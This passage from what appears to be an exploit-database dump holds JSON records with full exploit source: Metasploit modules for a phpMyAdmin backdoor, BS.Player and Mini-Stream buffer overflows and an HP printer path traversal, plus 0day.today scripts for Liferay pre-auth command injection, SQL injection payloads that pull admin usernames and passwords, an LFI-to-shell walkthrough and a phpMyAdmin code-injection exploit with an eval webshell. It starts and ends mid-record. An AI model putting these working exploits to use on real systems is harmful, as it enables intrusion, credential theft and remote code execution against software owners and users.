res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No ofc_upload_image.php found\")\n elsif res.body =~ /can't write file/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write '#{@fname}'\")\n elsif res.body =~ /Saving your image to: (.+)#{@fname}/\n path = $1\n register_files_for_cleanup(@fname)\n print_status(\"Executing '#{path}#{@fname}'\")\n else\n fail_with(Failure::NotVulnerable, \"#{peer} - File wasn't uploaded, aborting!\")\n end\n\n # Execute\n res = send_request_raw({\n 'uri' => normalize_uri(target_uri.path, path, @fname)\n })\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{@fname}\")\n end\n\n end\nend\n\n#\n# Source\n#\n=begin ofc_upload_image.php\n20-// default path for the image to be stored //\n21-$default_path = '../tmp-upload-images/';\n\n23-if (!file_exists($default_path)) mkdir($default_path, 0777, true);\n\n25-// full path to the saved image including filename //\n26-$destination = $default_path . basename( $_GET[ 'name' ] );\n\n28-echo 'Saving your image to: '. $destination;\n\n39-$jfh = fopen($destination, 'w') or die(\"can't open file\");\n40-fwrite($jfh, $HTTP_RAW_POST_DATA);\n41-fclose($jfh);\n=end\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb"}, {"lastseen": "2019-12-04T09:44:50", "bulletinFamily": "exploit", "description": "This module exploits an arbitrary code execution backdoor placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror.\n", "modified": "2017-07-24T13:26:21", "published": "2012-09-25T15:47:30", "id": "MSF:EXPLOIT/MULTI/HTTP/PHPMYADMIN_3522_BACKDOOR", "href": "", "type": "metasploit", "title": "phpMyAdmin 3.5.2.2 server_sync.php Backdoor", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor',\n 'Description' => %q{\n This module exploits an arbitrary code execution backdoor\n placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2012-5159' ],\n [ 'OSVDB', '85739' ],\n [ 'EDB', '21834' ],\n [ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php' ]\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'ConnectionType' => 'find',\n },\n # Arbitrary big number. The payload gets sent as an HTTP\n # response body, so really it's unlimited\n 'Space' => 262144, # 256k\n },\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 30\n },\n 'DisclosureDate' => 'Sep 25 2012',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [[ 'Automatic', { }]],\n 'DefaultTarget' => 0))\n\n register_options([\n OptString.new('PATH', [ true , \"The base directory containing phpMyAdmin try\", '/phpMyAdmin'])\n ])\n end\n\n def exploit\n\n uris = []\n\n tpath = datastore['PATH']\n if tpath[-1,1] == '/'\n tpath = tpath.chop\n end\n\n pdata = \"c=\" + Rex::Text.to_hex(payload.encoded, \"%\")\n\n res = send_request_raw( {\n 'global' => true,\n 'uri' => tpath + \"/server_sync.php\",\n 'method' => 'POST',\n 'data' => pdata,\n 'headers' => {\n 'Content-Type' => 'application/x-www-form-urlencoded',\n 'Content-Length' => pdata.length,\n }\n }, 1.0)\n\n handler\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb"}, {"lastseen": "2019-11-29T09:40:17", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in BS.Player 2.57. When the playlist import is used to import a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.\n", "modified": "2017-07-24T13:26:21", "published": "2012-01-12T21:12:43", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/BSPLAYER_M3U", "href": "", "type": "metasploit", "title": "BS.Player 2.57 Buffer Overflow (Unicode SEH)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BS.Player 2.57 Buffer Overflow (Unicode SEH)',\n 'Description' => %q{\n This module exploits a buffer overflow in BS.Player 2.57. When\n the playlist import is used to import a specially crafted m3u file,\n a buffer overflow occurs allowing arbitrary code execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'C4SS!0 G0M3S ', # Original Exploit\n 'Chris Gabriel', # MSF Module\n #Greets: Corelan team for mona.py & awesome tutorials\n ],\n 'References' =>\n [\n [ 'OSVDB', '82528' ],\n [ 'EDB', '15934' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n #'InitialAutoRunScript' => 'migrate -f',\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'Space' => 2000,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x1a\\x80\",\n 'DisableNops' => true,\n 'StackAdjustment' => -3500,\n },\n\n 'Targets' =>\n [\n [ 'Windows XP',\n {\n # pop ecx # pop ebp # ret 0c\n # ASLR: False, Rebase: False, SafeSEH: False\n # v2.5.7.1051 (bsplayer.exe)\n 'Ret' => \"\\x2f\\x49\",\n 'Offset' => 4102,\n 'Padding' => 1879\n }\n ],\n [ 'Windows 7',\n {\n # pop ecx # pop ebp # ret 0c\n # ASLR: False, Rebase: False, SafeSEH: False\n # v2.5.7.1051 (bsplayer.exe)\n 'Ret' => \"\\x2f\\x49\",\n 'Offset' => 4102,\n 'Padding' => 1931\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jan 07 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),\n ])\n\n end\n\n def exploit\n\n nseh = \"\\x61\\x42\"\n\n align = ''\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x58\"\t# POP EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\x50\"\t# PUSH EAX\n align << \"\\x6d\"\t# PAD\n align << \"\\xc3\"\t# RET\n\n enc = framework.encoders.create('x86/unicode_mixed')\n register_to_align_to = \"EAX\"\n enc.datastore.import_options_from_hash({ 'BufferRegister' => register_to_align_to })\n unicodepayload = enc.encode(payload.encoded, nil, nil, platform)\n\n padding = rand_text_alpha_lower(target['Padding'])\n\n buffer = \"http://\"\n buffer << rand_text_alpha_lower(target['Offset'])\n buffer << nseh\n buffer << target['Ret']\n buffer << align\n buffer << padding\n buffer << unicodepayload\n\n file_create(buffer)\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/bsplayer_m3u.rb"}, {"lastseen": "2019-11-21T21:02:17", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1 By creating a specially crafted pls file, an attacker may be able to execute arbitrary code.\n", "modified": "2017-09-14T02:03:34", "published": "2011-11-04T08:20:43", "id": "MSF:EXPLOIT/WINDOWS/MISC/MINI_STREAM", "href": "", "type": "metasploit", "title": "Mini-Stream 3.0.1.1 Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1\n By creating a specially crafted pls file, an attacker may be able\n to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # CORELAN Security Team\n 'Ron Henry <rlh[at]ciphermonk.net>', # dijital1; Return address update\n ],\n 'References' =>\n [\n [ 'CVE', '2009-5109'],\n [ 'OSVDB', '61341' ],\n [ 'EDB', '10745' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 3500,\n 'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\\x26\\x3d\\x2b\\x3f\\x3a\\x3b\\x2d\\x2c\\x2f\\x23\\x2e\\x5c\\x30\",\n 'StackAdjustment' => -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'Windows XP SP3 ENG',\n {\n 'Ret' => 0x7e429353, # 0x7e429353 JMP ESP - USER32.dll\n 'Offset' => 17417\n }\n ],\n [\n 'Windows XP SP2 ENG',\n {\n 'Ret' => 0x7c941eed, # 0x7c941eed JMP ESP - SHELL32.dll\n 'Offset' => 17417\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Dec 25 2009',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('URIPATH', [ true, 'The URI to use for this exploit', 'msf.pls'])\n ])\n end\n\n\n def on_request_uri(cli, request)\n # Calculate the correct offset\n host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n host << \":#{datastore['SRVPORT']}/\"\n offset = target['Offset'] - host.length\n\n # Construct our buffer\n sploit = rand_text_alpha(offset)\n sploit << [target.ret].pack('V')\n sploit << make_nops(32)\n sploit << @p\n\n print_status(\"Sending malicous payload\")\n send_response(cli, sploit, {'Content-Type'=>'application/pls+xml'})\n end\n\n def exploit\n @p = payload.encoded\n super\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/mini_stream.rb"}], "zdt": [{"lastseen": "2018-03-09T16:07:50", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2014-12-30T00:00:00", "published": "2014-12-30T00:00:00", "id": "1337DAY-ID-23043", "href": "https://0day.today/exploit/description/23043", "type": "zdt", "title": "Liferay Portal 7.0.x <= 7.0.2 - Pre-Auth RCE Exploit", "sourceData": "#!/bin/sh\r\n \r\n# Exploit title: Liferay Portal 7.0 RCE\r\n# Date: 11/16/2014\r\n# Exploit author: drone (@dronesec)\r\n# Vendor homepage: http://www.liferay.com/\r\n# Software link: http://downloads.sourceforge.net/project/lportal/Liferay%20Portal/7.0.0%20M2/liferay-portal-tomcat-7.0-ce-m2-20141017162509960.zip\r\n# Version: 7.0.0/7.0.1/7.0.2\r\n# Fixed in: 7.0.3\r\n# Tested on: Windows 7\r\n \r\n# Pre-auth command injection using an exposed Apache Felix,\r\n# exposed by default on all Liferay Portal 7.0 installs.\r\n#\r\n# ./liferay_portal7.sh 192.168.1.1 \"cmd.exe /C calc.exe\"\r\n#\r\n \r\n \r\n(echo open $1 11311\r\nsleep 1\r\necho system:getproperties\r\nsleep 1\r\necho exec \\\"$2\\\"\r\nsleep 1\r\n) | telnet\n\n# 0day.today [2018-03-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/23043"}, {"lastseen": "2018-04-12T03:52:27", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2012-07-10T00:00:00", "published": "2012-07-10T00:00:00", "id": "1337DAY-ID-18946", "href": "https://0day.today/exploit/description/18946", "type": "zdt", "title": "Wordpress Plugins - WP-Predict v1.0 Blind SQL Injection", "sourceData": "# Exploit Title: WordPress WP-Predict v1.0 Blind SQL Injection\r\n# Date: 7/9/12\r\n# Exploit Author: Chris Kellum\r\n# Vendor Homepage: http://www.pootlepress.co.uk/\r\n# Software Link: http://downloads.wordpress.org/plugin/wp-predict.zip\r\n# Version: 1.0\r\n \r\n \r\n \r\n=====================\r\nVulnerability Details\r\n=====================\r\n \r\nPredictId parameter in post request is vulnerable to blind SQL injection.\r\n \r\n===============\r\nTesting Details\r\n===============\r\n \r\nWhen attempting follow-up submissions, the plugin states that you've already voted. This can easily be circumvented by using your browser's back button.\r\n \r\n=================\r\nInjection Example\r\n=================\r\n \r\nUsing Burp Suite or other proxy, intercept the post request when submitting your answer and append and 1=1 to the predictId parameter before forwarding:\r\n \r\npredictSelection=1&predictId=1 and 1=1&postAction=submitVote&submitVote.x=70&submitVote.y=26\r\n \r\nIn the example above, the statement evaluates to true and the vote count increases by 1.\r\n \r\nSending a new request with \"predictId=1 and 1=0\" will not increase the vote count.\r\n\r\n\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18946"}, {"lastseen": "2018-01-06T01:04:34", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2011-08-07T00:00:00", "published": "2011-08-07T00:00:00", "id": "1337DAY-ID-16622", "href": "https://0day.today/exploit/description/16622", "type": "zdt", "title": "Cart Software Multiple Vulnerabilities", "sourceData": "# Exploit Title: sabadkharid CMS Multiple Vulnerabilities\r\n# Date: 8/07/2011\r\n# Author: hosinn\r\n# Software Link: http://www.sabadkharid.com\r\n# Version: professional edition\r\n# Platform / Tested on: Multiple\r\n# Category: webapplications\r\n# Code : N/A\r\n# Download Video: http://hosinn.persiangig.com/video/sabadkharid.rar\r\n# BUG Sql Injectin : ###############################################################\r\n \r\n1 > cart.php have sql injection bug .\r\n \r\n2 > go to http://target.com/cart.php?shopping_cart&add2cart=10'\r\n \r\n \r\n# Expolite : #######################################################################\r\n \r\n1 > get version => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select (select @@version) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/\r\n \r\n2 > get username => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select (select login) from SKH_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/\r\n \r\n > output like 'admin1' and username:admin\r\n \r\n3 > get password => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select (select cust_password) from SKH_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/\r\n \r\n > output like 'pass1' and username:pass\r\n \r\n4 > Then Login To Site\r\n \r\n# BUG LFI : ######################################################################\r\n \r\n1 > Go To Http://site.com/admin.php\r\n \r\n2 > Go To Http://site.com/admin.php?tab=conf\u00e2\u0160\u201a=template&edit=../../../cart.php\r\n \r\n3 > Then Copy Your Shell script & Save\r\n \r\n4 > Find Your Shell in Http://site.com/cart.php\r\n \r\n \r\n#############################################################################\r\nOur Website : http://www.nopotm.ir\r\nSpecial Thanks to : H-SK33PY , Immortal Boy , BigB4NG , N3td3v!l ,\r\nBlacksun , Drosera^Cqq47 , NOPO , zilli0o0n & all iranian NOPO members\r\n#############################################################################\r\n\r\n\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16622"}, {"lastseen": "2018-03-02T23:43:49", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category remote exploits", "modified": "2011-08-07T00:00:00", "published": "2011-08-07T00:00:00", "id": "1337DAY-ID-16623", "href": "https://0day.today/exploit/description/16623", "type": "zdt", "title": "HP JetDirect PJL Interface Universal Path Traversal", "sourceData": "# Exploit Title: HP JetDirect PJL Interface Universal Path Traversal\r\n# Date: Aug 7, 2011\r\n# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>\r\n# Software Link: http://www.hp.com\r\n# Version: All\r\n# Tested on: HP LaserJet Pxxxx Series\r\n \r\n##\r\n# $Id: $\r\n##\r\n \r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\n \r\n##\r\n# Sample Output:\r\n#\r\n#\r\n# msf auxiliary(hp_printer_pjl_traversal) > show options\r\n#\r\n# Module options (auxiliary/admin/hp_printer_pjl_traversal):\r\n#\r\n# Name Current Setting Required Description\r\n# ---- --------------- -------- -----------\r\n# INTERACTIVE false no Enter interactive mode [msfconsole Only]\r\n# RHOST 202.138.16.21 yes The target address\r\n# RPATH / yes The remote filesystem path to browse or read\r\n# RPORT 9100 yes The target port\r\n#\r\n#\r\n# msf auxiliary(hp_printer_pjl_traversal) > run\r\n#\r\n# [*] cd / ...\r\n# [+] Server returned the following response:\r\n#\r\n# . TYPE=DIR\r\n# .. TYPE=DIR\r\n# bin TYPE=DIR\r\n# usr TYPE=DIR\r\n# etc TYPE=DIR\r\n# hpmnt TYPE=DIR\r\n# hp TYPE=DIR\r\n# lib TYPE=DIR\r\n# dev TYPE=DIR\r\n# init TYPE=FILE SIZE=9016\r\n# .profile TYPE=FILE SIZE=834\r\n# tmp TYPE=DIR\r\n#\r\n#\r\n# msf auxiliary(hp_printer_pjl_traversal) > set INTERACTIVE true\r\n# INTERACTIVE => true\r\n# msf auxiliary(hp_printer_pjl_traversal) > set RPATH /hp\r\n# RPATH => /hp\r\n# msf auxiliary(hp_printer_pjl_traversal) > run\r\n#\r\n# [*] Entering interactive mode ...\r\n# [*] cd /hp ...\r\n# [+] Server returned the following response:\r\n#\r\n# . TYPE=DIR\r\n# .. TYPE=DIR\r\n# app TYPE=DIR\r\n# lib TYPE=DIR\r\n# bin TYPE=DIR\r\n# webServer TYPE=DIR\r\n# images TYPE=DIR\r\n# DemoPage TYPE=DIR\r\n# loc TYPE=DIR\r\n# AsianFonts TYPE=DIR\r\n# data TYPE=DIR\r\n# etc TYPE=DIR\r\n# lrt TYPE=DIR\r\n#\r\n# [*] Current RPATH: /hp\r\n# [*] -> 'quit' to exit\r\n# [*] ->'/' to return to file system root\r\n# [*] ->'..' to move up to one directory\r\n# [*] ->'!r FILE' to read FILE on current directory\r\n#\r\n# [*] Enter RPATH:\r\n# $ > webServer/config\r\n# [*] cd /hp/webServer/config ...\r\n# [+] Server returned the following response:\r\n#\r\n# . TYPE=DIR\r\n# .. TYPE=DIR\r\n# soe.xml TYPE=FILE SIZE=23615\r\n# version.6 TYPE=FILE SIZE=45\r\n#\r\n#\r\n# [*] Current RPATH: /hp/webServer/config\r\n# [*] -> 'quit' to exit\r\n# [*] ->'/' to return to file system root\r\n# [*] ->'..' to move up to one directory\r\n# [*] ->'!r FILE' to read FILE on current directory\r\n#\r\n# [*] Enter RPATH:\r\n# $ > !r version.6\r\n# [*] cat /hp/webServer/config/version.6 ...\r\n# [+] Server returned the following response:\r\n#\r\n# WebServer directory version. Do not delete!\r\n#\r\n#\r\n# [*] Current RPATH: /hp/webServer/config\r\n# [*] -> 'quit' to exit\r\n# [*] ->'/' to return to file system root\r\n# [*] ->'..' to move up to one directory\r\n# [*] ->'!r FILE' to read FILE on current directory\r\n#\r\n# [*] Enter RPATH:\r\n# $ > quit\r\n# [*] Exited ... Have fun with your Printer!\r\n# [*] Auxiliary module execution completed\r\n \r\n \r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Auxiliary\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'HP JetDirect PJL Interface Universal Path Traversal',\r\n 'Version' => '$Revision: 1 $',\r\n 'Description' => %q{\r\n This module exploits path traveresal issue in possibly all HP network-enabled printer series, especially those which enable Printer Job Language (aka PJL) command interface through the default JetDirect port 9100.\r\n With the decade-old dot-dot-slash payloads, the entire printer file system can be accessed or modified.\r\n },\r\n 'Author' => [\r\n 'Moritz Jodeit <http://www.nruns.com/>', # Bug Discoverer\r\n 'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' # Metasploit Module \r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2010-4107' ],\r\n [ 'URL', 'http://www.nruns.com/_downloads/SA-2010%20003-Hewlett-Packard.pdf' ], \r\n [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02004333' ], \r\n [ 'URL', 'http://www.irongeek.com/i.php?page=security/networkprinterhacking' ],\r\n [ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-laserjet-printer.rb' ],\r\n [ 'URL', 'https://github.com/urbanadventurer/WhatWeb/blob/master/plugins/HP-OfficeJet-Printer.rb' ],\r\n [ 'URL', 'http://core.yehg.net/lab/#tools.exploits' ]\r\n ],\r\n 'DisclosureDate' => '2010-11-15'))\r\n \r\n register_options(\r\n [\r\n \r\n OptString.new('RPATH',\r\n [\r\n true,\r\n \"The remote filesystem path to browse or read\",\r\n \"/\"\r\n ]\r\n ),\r\n OptBool.new('INTERACTIVE',\r\n [\r\n false,\r\n \"Enter interactive mode [msfconsole Only]\",\r\n false\r\n ]\r\n ),\r\n \r\n Opt::RPORT(9100)\r\n ],self.class)\r\n \r\n \r\n end\r\n \r\n def run\r\n mode = datastore['INTERACTIVE']\r\n \r\n if mode == true\r\n set_interactive(datastore['RPATH'])\r\n else\r\n set_onetime(datastore['RPATH'])\r\n end\r\n end\r\n \r\n def set_interactive(spath)\r\n action = 'DIR'\r\n rpath = spath\r\n rfpath = ''\r\n tmp_path = ''\r\n tmp_file = ''\r\n cur_dir = '/'\r\n \r\n print_status(\"Entering interactive mode\")\r\n stop = false\r\n \r\n set_onetime(rpath)\r\n \r\n until stop == true \r\n print_status(\"Current RPATH: #{rpath}\")\r\n print_status(\"-> 'quit' to exit\")\r\n print_status(\"->'/' to return to file system root\")\r\n print_status(\"->'..' to move up to one directory\")\r\n print_status(\"->'!r FILE' to read FILE on current directory\\r\\n\")\r\n print_status(\"Enter RPATH:\")\r\n print(\"$ > \")\r\n \r\n tmp_path = gets.chomp.to_s \r\n \r\n \r\n if tmp_path =~ /\\.\\./ && rpath.length > 2\r\n old_path = rpath\r\n new_path = rpath[0,rpath.rindex('/')]\r\n if new_path != nil\r\n rpath = new_path\r\n else\r\n rpath = '/'\r\n end\r\n rpath = '/' if rpath.length == 0\r\n print_status(\"Change to one up directory: #{rpath}\")\r\n elsif tmp_path =~ /\\!r\\s/ \r\n cur_dir = rpath\r\n tmp_file = tmp_path.gsub('!r ','')\r\n rfpath = cur_dir + '/' + tmp_file\r\n rfpath = rfpath.gsub('//','/') \r\n action = 'FILE'\r\n \r\n elsif tmp_path == '/'\r\n rpath = '/'\r\n elsif rpath != '/'\r\n rpath = rpath + '/' << tmp_path\r\n else\r\n rpath = rpath << tmp_path\r\n end\r\n if rpath =~ /quit/\r\n stop= true\r\n rpath = '/'\r\n print_status(\"Exited ... Have fun with your Printer!\")\r\n else\r\n rpath = rpath.gsub('//','/') \r\n if action == 'FILE'\r\n set_onetime(rfpath,action)\r\n cur_dir = rpath\r\n else\r\n set_onetime(rpath,action)\r\n end\r\n action = 'DIR' \r\n end\r\n end\r\n end\r\n \r\n def set_onetime(spath,saction = datastore['ACTION'])\r\n \r\n rpathx = spath\r\n action = saction\r\n rpathx = '/' if rpathx =~ /\\/quit/\r\n \r\n connect\r\n \r\n dir_cmd = \"\\x1b%[email\u00a0protected] FSDIRLIST NAME=\\\"0:/../../../[REPLACE]\\\" ENTRY=1 COUNT=99999999\\x0d\\x0a\\x1b%-12345X\\x0d\\x0a\"\r\n file_cmd = \"\\x1b%[email\u00a0protected] FSUPLOAD NAME=\\\"0:/../../../[REPLACE]\\\" OFFSET=0 SIZE=99999999\\x0d\\x0a\\x1b%-12345X\\x0d\\x0a\"\r\n \r\n if action =~ /DIR/\r\n r_cmd = dir_cmd.sub(\"[REPLACE]\",rpathx)\r\n print_status(\"cd #{rpathx} ...\")\r\n else\r\n r_cmd = file_cmd.sub(\"[REPLACE]\",rpathx)\r\n print_status(\"cat #{rpathx} ...\") \r\n end\r\n \r\n \r\n \r\n recv = sock.put(r_cmd)\r\n res = sock.get(-1,1)\r\n \r\n if (!res)\r\n print_error(\"ERROR in receiving data!\\r\\n\")\r\n else\r\n if res.to_s =~ /ERROR/\r\n print_error(\"Operation Not Permitted or File/DIR Not Found!\\r\\n\")\r\n disconnect\r\n return\r\n end\r\n resx = res.to_s[res.index(\"\\r\\n\")+1,res.length]\r\n print_good(\"Server returned the following response:\\r\\n#{resx}\")\r\n end\r\n \r\n disconnect \r\n \r\n end\r\n \r\n \r\nend\r\n\r\n\n\n# 0day.today [2018-03-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16623"}, {"lastseen": "2018-04-08T01:47:24", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2011-07-09T00:00:00", "published": "2011-07-09T00:00:00", "id": "1337DAY-ID-16503", "href": "https://0day.today/exploit/description/16503", "type": "zdt", "title": "phpMyAdmin 3.x Swekey Remote Code Injection Exploit", "sourceData": "<?php /*\r\n# Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit\r\n# Date: 2011-07-09\r\n# Author: Mango of ha.xxor.se\r\n# Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1\r\n# CVE : CVE-2011-2505, CVE-2011-2506\r\n# Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt\r\n# Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html\r\n*/\r\necho php_sapi_name()!=='cli'?'<pre>':'';?>\r\n .\r\n , )\\ .\r\n . ,/) , / ) , )\\\r\n )\\( /)/( (__( /( / ) __ __ ________ __ __\r\n / \\ ( )| |) \\ / | |\\ /| | | | | | | | (__)\r\n( ______ / | |_____( ______ | | \\/ | | __ __ | |__| | ___| | __ ___________ __ __ _____\r\n \\| | \\ \\ | | | |)| | \\ \\ | | | | | | | | | | | | / / | | | | | | | | | | | | | |\r\n | |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__|\r\n==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]============== \r\n phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] []\r\n Remote Code Injection [] [][] [] [] [] [] [] []\r\n http://ha.xxor.se [][] [] [] [] [][] [][] [] []\r\n _ _ ___ __ ____ __ ___ ___ \r\n | |-| || _ |\\ /\\ /| _ || ) \r\n |_|-|_||_|_|/_._\\/_._\\|___||_|_\\ \r\n ___ ___ ___ _ _ ___ ___ __ __ \r\n ( < | [_ / /| || || )(_)| |\\ | /\r\n >__)|_[_ \\__\\|____||_|_\\|_| |_| |_|\r\n \r\nUse responsibly.\r\n \r\n<?php echo php_sapi_name()!=='cli'?'</pre>':'';\r\n \r\nif(php_sapi_name()==='cli'){\r\n if(!isset($argv[1])){\r\n output(\" Usage\\n \".$argv[0].\" http://example.com/phpMyAdmin-3.3.9.2\");\r\n killme();\r\n }\r\n $pmaurl = $argv[1];\r\n}else{\r\n $pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';\r\n}\r\n$code = 'foreach($_GET as $k=>$v)if($k===\"eval\")eval($v);';\r\n$cookie = null;\r\n$token = null;\r\nif(!function_exists('curl_init')){\r\n output('[!] Fatal error. Need cURL!');\r\n killme();\r\n}\r\n$ch = curl_init();\r\n$debug = 0;\r\nif(php_sapi_name()!=='cli'){\r\n?>\r\n<form method=post>\r\nURL: <input name=url value=\"<?php echo htmlspecialchars($pmaurl);?>\"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>\r\n<input name=submit type=submit value=\u00e2\u2122\u00a5>\r\n</form>\r\n<pre>\r\n<?php\r\nif(!isset($_REQUEST['submit']))killme(true);\r\n}\r\n \r\noutput(\"[i] Running...\");\r\n \r\n// Start a session and get a token\r\ncurl_setopt_array($ch, array(\r\n CURLOPT_URL => $pmaurl.'/setup/index.php',\r\n CURLOPT_HEADER => 1,\r\n CURLOPT_RETURNTRANSFER => 1,\r\n CURLOPT_TIMEOUT => 4,\r\n CURLOPT_SSL_VERIFYPEER => 